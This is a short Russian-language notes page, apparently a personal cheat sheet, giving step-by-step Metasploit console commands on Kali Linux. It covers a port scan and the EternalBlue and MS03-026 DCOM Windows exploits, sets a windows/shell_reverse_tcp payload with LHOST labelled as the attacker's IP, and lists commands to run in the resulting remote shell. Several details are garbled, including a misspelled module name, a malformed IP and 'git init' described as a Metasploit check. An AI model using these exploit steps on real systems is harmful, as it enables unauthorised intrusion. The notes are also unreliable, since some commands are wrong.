Рубрики
kali \ virus \ rootkit \ вирусы \ защита

kali / metasploit / meterpreter

use kali linux

0) msfconsole - запуск метасплоит
1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита
2) set rhost 127.0.0.01 - выбор ip атакуемого
3) exploit - применить эксплоит

примеры команд

https://localhost:3790/ - веб интерфейс

msfconsole - запуск метасплоит
db_status - проверка базы 
git init - проврка запуска метасполоит 

use auxiliary/scanner/portscan/tcp - использовать сканер
set PORTS 1-5000 - задать диапазон портов для сканирования
set RHOSTS 192.168.88.161 - задать ip для сканирования
run - запуск


search dcom - поиск эксплоитов dcom
use exploit/windows/dcerpc/ms03_026_dcom - будем использовать эксплоит
set payload windows/shell_reverse_tcp - в случае удачи заливаем нагрузку shell_reverse_tcp 
show options - смотрим обязательные опции для нагрузки
set RHOSTS 192.168.88.161 - IP той машины, которую будем проверять на защищенность
set LHOST 192.168.88.247  - IP злоумышленника
run - запуск


cd ..\..\ - видовая команда перехода между каталогами ( скорее всего попадем на диск C:\ ) (.. вернутся на каталог выше) ( . текущий каталог)
echo Hello! >  achtung.x - создать текстовый файл achtung.x с содержимым Hello!
msg helo - виндовая команда посылки сообщения
можно вводить любую команду, как в обычном cmd.exe


Добавить комментарий